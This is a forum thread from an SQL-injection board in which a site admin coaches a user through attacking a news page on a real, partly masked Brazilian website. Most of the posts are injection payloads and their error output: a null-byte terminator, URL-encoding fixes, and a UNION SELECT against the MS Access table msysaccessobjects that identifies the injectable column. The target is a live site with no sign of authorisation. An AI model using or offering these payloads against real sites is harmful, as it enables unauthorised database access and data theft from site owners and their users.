|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
missing operator??? |
|
Posted: Thu May 15, 2008 10:29 am |
|
|
mux0x55 |
Regular user |
|
|
Joined: May 08, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
Hi again guys..
When I try this:
Code: | http://www.*****.org.br/le***noticias.asp?id=1316 or 1=convert(int, @@version) |
I obtain this:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in expression or 1 etc...
even if I try other operators (and, union etc..)
What's wrong?
Thank u in advance |
|
|
|
|
Posted: Thu May 15, 2008 11:45 am |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
First task is always to get syntax right.
Try these tests:
Code: |
noticias.asp?id=1316+AND+1=1
|
Code: |
noticias.asp?id=1316%00
|
Code: |
noticias.asp?id=1315%2b1
|
Code: |
noticias.asp?id=1316)%00
|
And can you provoke error messages, which reveal details of affected query? |
|
|
|
|
|
|
|
|
Posted: Thu May 15, 2008 1:13 pm |
|
|
mux0x55 |
Regular user |
|
|
Joined: May 08, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
[quote="waraxe"]First task is always to get syntax right.
Try these tests:
Code: |
noticias.asp?id=1316+AND+1=1
|
gives the same error without other info...
Code: |
noticias.asp?id=1316%00
|
no errors and returns a valid page
Code: |
noticias.asp?id=1315%2b1
|
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/le****noticias.asp, line 0
Code: |
noticias.asp?id=1316)%00
|
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Extra ) in query expression 'newsid=1316)'.
/le****noticias.asp, line 12
Thank u again waraxe... |
|
|
|
|
Posted: Thu May 15, 2008 1:21 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
OK, try these:
Code: |
noticias.asp?id=-1%00
|
Code: |
noticias.asp?id=-1+UNION+SELECT+1%00
|
|
|
|
|
|
Posted: Thu May 15, 2008 1:29 pm |
|
|
mux0x55 |
Regular user |
|
|
Joined: May 08, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
Code: |
noticias.asp?id=-1%00
|
ADODB.Field error '80020009'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/ler****noticias.asp, line 0
Code: |
noticias.asp?id=-1+UNION+SELECT+1%00
| [/quote]
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'newsid=-1+'.
/ler****noticias.asp, line 12
Thank u |
|
|
|
|
Posted: Thu May 15, 2008 1:33 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
OK, problem with urlencoding.
Try this:
Code: |
noticias.asp?id=-1 UNION SELECT 1%00
|
|
|
|
|
|
Posted: Thu May 15, 2008 1:53 pm |
|
|
mux0x55 |
Regular user |
|
|
Joined: May 08, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
Code: |
noticias.asp?id=-1 UNION SELECT 1%00
| [/quote]
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/ler***noticias.asp, line 12
no unions allowed... thank u for ur time waraxe
|
|
|
|
|
Posted: Thu May 15, 2008 2:29 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
No, UNION is usually supported by Jet database.
Try this:
Code: |
noticias.asp?id=-1 UNION SELECT 1 FROM msysaccessobjects%00
|
|
|
|
|
|
Posted: Thu May 15, 2008 5:06 pm |
|
|
mux0x55 |
Regular user |
|
|
Joined: May 08, 2008 |
Posts: 7 |
|
|
|
|
|
|
|
Code: |
noticias.asp?id=-1 UNION SELECT 1 FROM msysaccessobjects%00
| [/quote]
ok:
Code: |
http://www.*****.org.br/le*****noticias.asp?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 FROM msysaccessobjects%00 |
column affected is 4.
But @@version doesn't work... maybe I don't know Access (I work with MySQL, MSSQL and Oracle) and google doesn't help me... |
|
|
|
|
Posted: Thu May 15, 2008 5:40 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|